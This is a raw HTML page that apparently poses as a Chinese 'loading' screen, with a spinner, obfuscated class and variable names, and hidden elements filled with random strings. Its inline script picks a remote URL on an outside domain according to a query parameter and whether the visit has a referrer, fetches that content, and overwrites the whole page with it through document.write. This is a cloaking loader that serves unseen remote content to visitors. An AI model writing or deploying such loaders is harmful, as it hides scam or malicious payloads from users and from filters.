<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .c3LrUauPO79 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .c3LrUauPO79 .gavtvP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .c3LrUauPO79 .content {
            line-height: 50px;
            text-align: center
        }

        .c3LrUauPO79 .img {
            width: 100%
        }

        .c3LrUauPO79 .UGGkk0auH4e {
            text-align: center
        }

        .c3LrUauPO79 .UGGkk0auH4e span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .c3LrUauPO79 .UGGkk0auH4e span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .c3LrUauPO79 .UGGkk0auH4e span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .c3LrUauPO79 .UGGkk0auH4e span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .c3LrUauPO79 .UGGkk0auH4e span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .c3LrUauPO79 .UGGkk0auH4e span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .c3LrUauPO79 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YAB3aJYEbpoNX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ALni6 = YAB3aJYEbpoNX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ALni6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ALni6 +".html?a=share";
		}
		
        Soyzi7nyK=url+"#"+new Date().getTime();
        Soyzi7nyK && function() {
            $.get(Soyzi7nyK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>mL8otDXyB7BvjKILrxsp8gAg5GIOMZrs833bPjoI8uOhdwch00RJgLCnudoZSMFlAt5rz2VpitZiqJtdLEW</p>
<p  style='display:none'>mL8otDXyB7BvjKILrxsp8gAg5GIOMZrs833bPjoI8uOhdwch00RJgLCnudoZSMFlAt5rz2VpitZiqJtdLEW</p>
<ul style='display:none' >gIorJCNgkraMhYkf</ul>
<h1 style='display:none' >rV1WeHznxe4</h1>
<div style='display:none'>jBJZ2PqZ1QJD1O7v72e</div>
<a  href='#' style='display:none'>at4jeciNZ04QFxT</a><div class="c3LrUauPO79">
    <div class="gavtvP">
        <div class="UGGkk0auH4e">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>tS7YFVmWhLE</a>
<b style='display:none' >FDabx5x7nk0pjrMa6aU7gzJfCRdMTn5awsGfr8gKETkPhSBKG</b>
<ul style='display:none' >fd7CGDrGTPpUOgh8dci5qIP1s2wtBGFYcBlgM5h8WU3SssngacRDEuEXvR2M9gk8fA</ul>
<div style='display:none'>wFVz0cDeQT036UZJyj6dSW5pyjtortKEk6249AElg</div>
<a  href='#' style='display:none'>tS7YFVmWhLE</a></body>
</html>